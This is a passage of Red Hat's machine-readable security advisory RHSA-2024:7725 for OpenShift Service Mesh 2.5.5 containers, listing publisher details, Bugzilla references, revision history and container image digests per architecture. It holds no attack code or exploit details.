about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", title: "Details", }, { category: "legal_disclaimer", text: "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", title: "Terms of Use", }, ], publisher: { category: "vendor", contact_details: "https://access.redhat.com/security/team/contact/", issuing_authority: "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", name: "Red Hat Product Security", namespace: "https://www.redhat.com", }, references: [ { category: "self", summary: "https://access.redhat.com/errata/RHSA-2024:7725", url: "https://access.redhat.com/errata/RHSA-2024:7725", }, { category: "external", summary: "https://access.redhat.com/security/updates/classification/#important", url: "https://access.redhat.com/security/updates/classification/#important", }, { category: "external", summary: "2259228", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2259228", }, { category: "external", summary: "2272986", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2272986", }, { category: "external", summary: "2276149", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2276149", }, { category: "external", summary: "2283145", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2283145", }, { category: "external", summary: "2308193", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308193", }, { category: "external", summary: "2311153", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311153", }, { category: "external", summary: "2311154", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311154", }, { category: "external", summary: "2311171", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311171", }, { category: "external", summary: "2313683", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2313683", }, { category: "self", summary: "Canonical URL", url: "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_7725.json", }, ], title: "Red Hat Security Advisory: Red Hat OpenShift Service Mesh Containers for 2.5.5", tracking: { current_release_date: "2025-04-10T00:21:12+00:00", generator: { date: "2025-04-10T00:21:12+00:00", engine: { name: "Red Hat SDEngine", version: "4.4.2", }, }, id: "RHSA-2024:7725", initial_release_date: "2024-10-07T09:24:53+00:00", revision_history: [ { date: "2024-10-07T09:24:53+00:00", number: "1", summary: "Initial version", }, { date: "2024-10-07T09:24:53+00:00", number: "2", summary: "Last updated version", }, { date: "2025-04-10T00:21:12+00:00", number: "3", summary: "Last generated version", }, ], status: "final", version: "3", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_name", name: "RHOSSM 2.5 for RHEL 8", product: { name: "RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5", product_identification_helper: { cpe: "cpe:/a:redhat:service_mesh:2.5::el8", }, }, }, ], category: "product_family", name: "Red Hat OpenShift Service Mesh", }, { branches: [ { category: "product_version", name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", product: { name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", product_id: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", product_identification_helper: { purl: "pkg:oci/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8&tag=1.73.14-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", product: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", product_id: "openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", product_identification_helper: { purl: "pkg:oci/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8&tag=2.5.5-4", }, }, }, { category: "product_version", name: "openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", product: { name: "openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", product_id: "openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", product_identification_helper: { purl: "pkg:oci/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8&tag=2.5.5-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", product: { name: "openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", product_id: "openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", product_identification_helper: { purl: "pkg:oci/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8&tag=1.73.15-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", product: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", product_id: "openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", product_identification_helper: { purl: "pkg:oci/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8&tag=2.5.5-4", }, }, }, { category: "product_version", name: "openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", product: { name: "openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", product_id: "openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", product_identification_helper: { purl: "pkg:oci/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8&tag=2.5.5-4", }, }, }, { category: "product_version", name: "openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", product: { name: "openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", product_id: "openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", product_identification_helper: { purl: "pkg:oci/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel8&tag=2.5.5-6", }, }, }, { category: "product_version", name: "openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", product: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", product_id: "openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", product_identification_helper: { purl: "pkg:oci/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60?arch=amd64&repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8&tag=2.5.5-3", }, }, }, ], category: "architecture", name: "amd64", }, { branches: [ { category: "product_version", name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", product: { name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", product_id: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", product_identification_helper: { purl: "pkg:oci/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8&tag=1.73.14-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", product: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", product_id: "openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", product_identification_helper: { purl: "pkg:oci/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8&tag=2.5.5-4", }, }, }, { category: "product_version", name: "openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", product: { name: "openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", product_id: "openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", product_identification_helper: { purl: "pkg:oci/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8&tag=2.5.5-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", product: { name: "openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", product_id: "openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", product_identification_helper: { purl: "pkg:oci/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8&tag=1.73.15-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", product: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", product_id: "openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", product_identification_helper: { purl: "pkg:oci/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8&tag=2.5.5-4", }, }, }, { category: "product_version", name: "openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", product: { name: "openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", product_id: "openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", product_identification_helper: { purl: "pkg:oci/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8&tag=2.5.5-4", }, }, }, { category: "product_version", name: "openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", product: { name: "openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", product_id: "openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", product_identification_helper: { purl: "pkg:oci/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel8&tag=2.5.5-6", }, }, }, { category: "product_version", name: "openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", product: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", product_id: "openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", product_identification_helper: { purl: "pkg:oci/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83?arch=s390x&repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8&tag=2.5.5-3", }, }, }, ], category: "architecture", name: "s390x", }, { branches: [ { category: "product_version", name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", product: { name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", product_id: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", product_identification_helper: { purl: "pkg:oci/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8&tag=1.73.14-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", product: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", product_id: "openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", product_identification_helper: { purl: "pkg:oci/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8&tag=2.5.5-4", }, }, }, { category: "product_version", name: "openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", product: { name: "openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", product_id: "openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", product_identification_helper: { purl: "pkg:oci/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8&tag=2.5.5-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", product: { name: "openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", product_id: "openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", product_identification_helper: { purl: "pkg:oci/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8&tag=1.73.15-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", product: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", product_id: "openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", product_identification_helper: { purl: "pkg:oci/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8&tag=2.5.5-4", }, }, }, { category: "product_version", name: "openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", product: { name: "openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", product_id: "openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", product_identification_helper: { purl: "pkg:oci/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8&tag=2.5.5-4", }, }, }, { category: "product_version", name: "openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", product: { name: "openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", product_id: "openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", product_identification_helper: { purl: "pkg:oci/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel8&tag=2.5.5-6", }, }, }, { category: "product_version", name: "openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", product: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", product_id: "openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", product_identification_helper: { purl: "pkg:oci/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8&tag=2.5.5-3", }, }, }, ], category: "architecture", name: "ppc64le", }, { branches: [ { category: "product_version", name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", product: { name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", product_id: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", product_identification_helper: { purl: "pkg:oci/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8&tag=1.73.14-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", product: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", product_id: "openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", product_identification_helper: { purl: "pkg:oci/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8&tag=2.5.5-4", }, }, }, { category: "product_version", name: "openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", product: { name: "openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", product_id: "openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", product_identification_helper: { purl: "pkg:oci/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8&tag=2.5.5-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", product: { name: "openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", product_id: "openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", product_identification_helper: { purl: "pkg:oci/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8&tag=1.73.15-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", product: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", product_id: "openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", product_identification_helper: { purl: "pkg:oci/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8&tag=2.5.5-4", }, }, }, { category: "product_version", name: "openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", product: { name: "openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", product_id: "openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", product_identification_helper: { purl: "pkg:oci/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8&tag=2.5.5-4", }, }, }, { category: "product_version", name: "openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", product: { name: "openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", product_id: "openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", product_identification_helper: { purl: "pkg:oci/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel8&tag=2.5.5-6", }, }, }, { category: "product_version", name: "openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", product: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", product_id: "openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", product_identification_helper: { purl: "pkg:oci/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8&tag=2.5.5-3", }, }, }, ], category: "architecture", name: "arm64", }, ], category: "vendor", name: "Red Hat", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", }, product_reference: "openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", }, product_reference: "openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64 as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", }, product_reference: "openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64 as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", }, product_reference: "openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", }, product_reference: 